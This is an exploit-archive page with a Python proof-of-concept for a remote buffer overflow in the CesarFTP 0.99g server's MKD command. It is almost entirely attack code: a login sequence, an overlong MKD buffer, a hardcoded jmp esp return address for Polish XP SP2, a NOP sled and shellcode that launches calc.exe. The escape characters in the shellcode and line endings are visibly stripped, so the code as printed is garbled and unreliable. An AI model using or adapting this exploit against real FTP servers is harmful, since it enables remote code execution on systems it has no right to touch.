CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit
# Published : 2006-06-12
# Author : h07
# Previous Title : D-Link Access-Point <= 2.10na (DWL Series) Config Disclosure Vuln
# Next Title : QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit

#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [h07@interia.pl]
#Date: 10.06.2006

from socket import *

shellcode = ( #execute calc.exe <metasploit.com>
"x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")

def intel_order(i):
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    str = "%c%c%c%c" % (a, b, c, d)
    return str

host = "127.0.0.1"
port = 21
user = "h07"
password = "open"
EIP = 0x7CA58265 #jmp esp <shell32.dll XP sp2 polish>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %srn" % (user))
print s.recv(1024)

s.send("pass %srn" % (password))
print s.recv(1024)

buffer = "MKD "
buffer += "n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "x90" * 40 + shellcode
buffer += "rn"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

#EoF 

# www.Syue.com [2006-06-12]